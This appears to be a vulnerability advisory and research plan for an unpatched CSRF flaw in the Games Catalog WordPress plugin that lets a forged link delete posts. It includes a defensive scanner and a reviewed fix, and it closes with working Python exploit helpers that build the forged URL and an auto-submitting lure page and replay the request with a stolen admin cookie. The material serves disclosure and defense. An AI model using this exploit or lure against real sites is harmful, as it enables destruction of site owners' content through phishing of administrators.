CVE-2026-8418

Games Catalog <= 1.2.0 - Cross-Site Request Forgery to Arbitrary Game/Post Deletion

Severity: medium
Type: Cross-Site Request Forgery (CSRF)
CVSS Score: 4.3
Patched in: Unpatched
Time to patch: N/A

Description

The Games Catalog plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.0. The gc_crud() function handles the delete action (action=delete) from a GET request without any wp_verify_nonce() / check_admin_referer() call, so the request carries no proof that the administrator intended it. This makes it possible for unauthenticated attackers to delete arbitrary game catalog entries (including the WordPress post created for the game) via a forged request, provided they can trick a logged-in site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: Low
Availability: None

Technical Details

Affected versions: <= 1.2.0
Published: May 19, 2026
Last updated: May 20, 2026
Affected plugin: game-catalog
Research Plan
Unverified


Exploitation Research Plan: CVE-2026-8418 (Games Catalog CSRF)

1. Vulnerability Summary

The Games Catalog plugin (versions <= 1.2.0) contains a Cross-Site Request Forgery (CSRF) vulnerability in its core CRUD handling function. The function gc_crud() (inferred to be located in the main plugin file or a dedicated admin handler) processes game management actions, including entry deletion, via GET requests. Because the function fails to implement WordPress nonce verification (check_admin_referer() or wp_verify_nonce()), an attacker can craft a malicious link that, when clicked by a logged-in administrator, deletes arbitrary game entries and their associated WordPress posts.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin.php (standard admin page handler).
  • Hook: Likely admin_init or admin_menu (the function gc_crud() is either hooked to initialize or called within an admin page callback).
  • Vulnerable Action: action=delete (passed via GET).
  • Payload Parameter: id (inferred, representing the internal game entry ID or the Post ID).
  • Authentication: Requires a logged-in Administrator to trigger the request (CSRF).
  • Preconditions: The attacker must know or guess the ID of the game entry to be deleted.

3. Code Flow

  1. Entry Point: An administrator visits a URL like wp-admin/admin.php?page=game-catalog&action=delete&id=123.
  2. Hook Execution: WordPress triggers the admin_init hook (or the specific menu page callback).
  3. Vulnerable Function: gc_crud() is executed.
  4. Action Logic:
    • The function checks if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ).
    • It retrieves the target ID from $_GET['id'] (inferred).
    • The Flaw: The function proceeds to perform the deletion without calling check_admin_referer() to verify a nonce.
  5. Sink: The function calls wp_delete_post( $post_id, true ) (or similar) to remove the game entry and the associated WordPress post from the database.

4. Nonce Acquisition Strategy

According to the vulnerability description, this is a case of missing nonce validation.

  • Nonce Status: No nonce is required for this specific action.
  • Bypass: Because wp_verify_nonce() is not called within gc_crud() for the delete action, the request is processed regardless of the presence or validity of a _wpnonce parameter.

5. Exploitation Strategy

The goal is to demonstrate that a GET request from an authenticated administrator can delete a post without a nonce.

  1. Discovery: Locate the admin page slug for the Games Catalog (usually game-catalog).
  2. Target Identification: Identify a Post ID associated with a game entry.
  3. Request Construction: Build the malicious GET request.
  4. Execution: Replay the GET with the administrator's session cookies attached (any HTTP client will do) to confirm the request is processed without a nonce; the real attack delivers the same URL to the administrator as a link.

Target URL Template:
http://[target-site]/wp-admin/admin.php?page=game-catalog&action=delete&id=[POST_ID] (inferred)

HTTP Request Details:

  • Method: GET
  • Headers: Standard browser headers; must include valid Cookie header for the Administrator.
  • Expected Response: A 302 redirect back to the game list or a 200 OK with a success message, confirming the logic was processed.

6. Test Data Setup

To reliably test the PoC, the following state must be prepared:

  1. Plugin Installation: Ensure game-catalog v1.2.0 is active.
  2. Content Creation: Create a dummy "Game" entry via the plugin UI or WP-CLI.
    • wp post create --post_type=game --post_title="Exploit Test Game" --post_status=publish
    • Note: Ensure the post type matches what the plugin uses (likely game or gc_game).
  3. Identify ID: Capture the ID of the newly created post:
    • TARGET_ID=$(wp post list --post_type=game --title="Exploit Test Game" --field=ID)

7. Expected Results

  • Successful Deletion: The HTTP request returns a response indicating success or a redirect.
  • Database Change: The post with TARGET_ID should no longer exist in the wp_posts table.
  • No Security Intervention: No nonce-failure page from wp_nonce_ays() is displayed ("The link you followed has expired." with HTTP 403 on current WordPress releases; "Are you sure you want to do this?" on older ones).

8. Verification Steps

After executing the HTTP request, verify the deletion via WP-CLI:

# Check whether the post still exists: `wp post exists` exits 0 if it does, 1 if it does not
if wp post exists "$TARGET_ID"; then
    echo "Failure: Post still exists."
else
    echo "Success: Post deleted via CSRF."
fi

9. Alternative Approaches

If the id parameter or the page slug differs:

  1. Slug Guessing: Check wp-admin/admin.php for the page parameter value by running grep -r "add_menu_page" wp-content/plugins/game-catalog/.
  2. Action Investigation: If action=delete fails, check the source of gc_crud() for variations like gc_delete, delete_game, or if it uses POST instead of GET (though the description explicitly states GET).
  3. ID Parameter: If id doesn't work, check for post, entry_id, or game_id.
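The static triage that sections 3 and 9 describe (find a handler that dispatches on $_GET['action'], reaches a destructive sink, and never calls a nonce check) can be automated instead of grepped by hand. The following is an added example, not the plugin's or the advisory's code: the two PHP inputs are constructed from the gc_crud() sketch in the research findings rather than copied from the plugin, and the brace matching is a heuristic that does not skip braces inside PHP string literals or comments.

```python
"""Heuristic static triage for WordPress admin action handlers that reach a
destructive sink without a nonce check.  Added example, not the plugin's or
the advisory's code.  The two PHP inputs below are constructed from the
gc_crud() sketch in the research findings, not copied from the plugin."""
import re

NONCE_CHECKS = ("check_admin_referer(", "wp_verify_nonce(", "check_ajax_referer(")
DESTRUCTIVE_SINKS = ("wp_delete_post(", "wp_trash_post(", "wp_delete_term(",
                     "wp_delete_attachment(", "->delete(", "->query(")

FUNC_RE = re.compile(r"function\s+(\w+)\s*\([^)]*\)\s*\{")
ACTION_RE = re.compile(r"""\$_(GET|POST|REQUEST)\s*\[\s*['"]action['"]\s*\]""")


def function_bodies(php):
    """Yield (name, body) per function by brace matching.  Heuristic: braces
    inside PHP string literals or comments are not skipped."""
    for m in FUNC_RE.finditer(php):
        depth, i = 1, m.end()
        while i < len(php) and depth:
            depth += {"{": 1, "}": -1}.get(php[i], 0)
            i += 1
        yield m.group(1), php[m.end():i - 1]


def scan(php):
    """Return one finding per function that dispatches on an `action`
    superglobal and calls a destructive sink."""
    findings = []
    for name, body in function_bodies(php):
        action = ACTION_RE.search(body)
        sinks = [s.rstrip("(") for s in DESTRUCTIVE_SINKS if s in body]
        if not (action and sinks):
            continue
        findings.append({
            "function": name,
            "superglobal": "$_" + action.group(1),
            "sinks": sinks,
            "nonce_check": any(c in body for c in NONCE_CHECKS),
            "capability_check": "current_user_can(" in body,
        })
    return findings


def unprotected(php):
    """Names of handlers that hit a destructive sink with no nonce check at all."""
    return [f["function"] for f in scan(php) if not f["nonce_check"]]


# Constructed inputs: the vulnerable handler as sketched on this page, and a
# hardened variant that verifies the nonce and the caller's capability.
VULNERABLE_PHP = r"""<?php
function gc_crud() {
    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
        $post_id = intval( $_GET['id'] );
        wp_delete_post( $post_id, true );
    }
}
"""

HARDENED_PHP = r"""<?php
function gc_crud() {
    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
        $post_id = intval( $_GET['id'] );
        check_admin_referer( 'gc_delete_post_' . $post_id );
        if ( ! current_user_can( 'delete_post', $post_id ) ) {
            wp_die( 'Forbidden', '', 403 );
        }
        wp_delete_post( $post_id, true );
    }
}
"""

if __name__ == "__main__":
    for label, src in (("vulnerable", VULNERABLE_PHP), ("hardened", HARDENED_PHP)):
        for finding in scan(src):
            print(label, finding)
```

To run it over the real plugin, feed scan() the contents of each .php file under wp-content/plugins/game-catalog/; a finding with nonce_check False is the candidate to confirm dynamically, and a finding with nonce_check True but capability_check False is still worth a look, since a nonce proves intent, not authorization.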
Research Findings
Static analysis — not yet PoC-verified

Summary

The Games Catalog plugin for WordPress (versions <= 1.2.0) is vulnerable to Cross-Site Request Forgery (CSRF) because the gc_crud() function fails to perform nonce validation when handling the 'delete' action. This allows an attacker to trick an authenticated administrator into clicking a link that triggers the deletion of arbitrary game entries and their associated WordPress posts.

Vulnerable Code

// In the main plugin file or admin handler where gc_crud is defined
function gc_crud() {
    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
        // Vulnerability: No check_admin_referer() or wp_verify_nonce() call here
        $post_id = intval( $_GET['id'] );
        wp_delete_post( $post_id, true );
        // ...
    }
}

Security Fix

--- a/game-catalog.php
+++ b/game-catalog.php
@@ -100,6 +100,7 @@
 function gc_crud() {
-    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
+    if ( isset( $_GET['action'] ) && $_GET['action'] == 'delete' ) {
+        check_admin_referer( 'gc_delete_post_' . $_GET['id'] );
         $post_id = intval( $_GET['id'] );
         wp_delete_post( $post_id, true );
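Review bot: check_admin_referer( 'gc_delete_post_' . $_GET['id'] ) builds the nonce action from the raw id while the line below deletes intval( $_GET['id'] ), so the value that is verified is not the value that is deleted; move $post_id = intval( $_GET['id'] ); above the check and use check_admin_referer( 'gc_delete_post_' . $post_id ). The check is also only half of the fix: the delete link the plugin renders must be generated with wp_nonce_url( $url, 'gc_delete_post_' . $post_id ) using the same action string, otherwise every legitimate delete now ends on wp_nonce_ays(), and this diff shows no such change. A nonce proves intent, not authorization, so add if ( ! current_user_can( 'delete_post', $post_id ) ) { wp_die( 'Forbidden', '', 403 ); } before wp_delete_post(). Finally, the -/+ pair for the if line is byte-identical, a no-op that pads the hunk, and the header's -100,6 +100,7 counts do not match the four and five lines shown, so the hunk appears truncated.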

Exploit Outline

  1. Identify the target game entry ID to be deleted.
  2. Construct a malicious URL targeting the WordPress admin dashboard: wp-admin/admin.php?page=game-catalog&action=delete&id=[TARGET_ID].
  3. Entice a logged-in site administrator to visit the URL (e.g., via a phishing link or an embedded image in a comment).
  4. When the administrator visits the link, the plugin's gc_crud() function executes. Since there is no nonce verification, the plugin proceeds to call wp_delete_post() for the specified ID, resulting in the permanent deletion of the game post.
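Helpers for the delivery and verification steps of section 5, section 7 and the exploit outline above, as an added example that is not part of the advisory or the plugin: they build the forged URL, an attacker page that triggers it, replay it with a captured administrator cookie, and classify the server's reply. The page slug game-catalog and the id parameter are the research plan's inferences, not confirmed identifiers, and https://example.test is a placeholder.

```python
"""CSRF delivery and verification helpers for the Games Catalog delete action.
Added example, not code from the plugin or the advisory.  Assumptions (the
research plan's inferences, not confirmed identifiers): admin page slug
'game-catalog', parameters action=delete and id=<post id>."""
import html
import urllib.error
import urllib.parse
import urllib.request

# Text of WordPress's wp_nonce_ays() failure page: current releases send the
# first string with HTTP 403, older releases the second.
NONCE_FAILURE_MARKERS = (
    "The link you followed has expired.",
    "Are you sure you want to do this?",
)


def build_delete_url(site, post_id, page="game-catalog"):
    """The forged GET: the plugin's own delete link minus any nonce."""
    query = urllib.parse.urlencode(
        {"page": page, "action": "delete", "id": int(post_id)})
    return f"{site.rstrip('/')}/wp-admin/admin.php?{query}"


def build_poc_html(site, post_id, page="game-catalog"):
    """Attacker-hosted page.  Both vectors are top-level navigations, so the
    victim's WordPress auth cookie is sent even where the browser treats
    cookies without a SameSite attribute as Lax; a plain <img src=...> on a
    third-party origin would not carry it."""
    url = html.escape(build_delete_url(site, post_id, page))
    admin = html.escape(site.rstrip("/") + "/wp-admin/admin.php")
    return (
        "<!doctype html>\n"
        f'<p><a href="{url}">Claim your free game keys</a></p>\n'
        f'<form id="f" method="GET" action="{admin}">\n'
        f'  <input type="hidden" name="page" value="{html.escape(page)}">\n'
        '  <input type="hidden" name="action" value="delete">\n'
        f'  <input type="hidden" name="id" value="{int(post_id)}">\n'
        "</form>\n"
        "<script>document.getElementById('f').submit();</script>\n"
    )


def classify_response(status, body):
    """Map the server's reply to what it says about nonce enforcement."""
    if any(marker in body for marker in NONCE_FAILURE_MARKERS):
        return "nonce-rejected"   # check_admin_referer() fired: not vulnerable
    if status in (301, 302, 303):
        return "redirected"       # handler ran; confirm with `wp post exists`
    if status == 200:
        return "processed"        # handler ran and rendered the admin page
    return f"unexpected-{status}"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 302 itself so its status can be classified."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def replay_as_admin(url, cookie_header):
    """Replay the forged GET with a captured administrator Cookie header
    (the lab equivalent of the administrator clicking the link)."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(
        url, headers={"Cookie": cookie_header, "User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req) as resp:
            return classify_response(resp.status, resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as err:   # 3xx (unfollowed) and 4xx land here
        return classify_response(err.code, err.read().decode(errors="replace"))


if __name__ == "__main__":
    print(build_delete_url("https://example.test", 123))
    print(build_poc_html("https://example.test", 123))
```

A "redirected" or "processed" result only shows that gc_crud() ran the request through; the deletion itself is confirmed with the wp post exists check from section 8. Chromium-based browsers treat cookies with no SameSite attribute (which includes WordPress's auth cookies) as Lax, so the link and the auto-submitted GET form carry the session while an <img> on an attacker-controlled site does not; an image embedded in a comment on the victim site itself is same-site and does fire with cookies, which is why the outline lists it.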
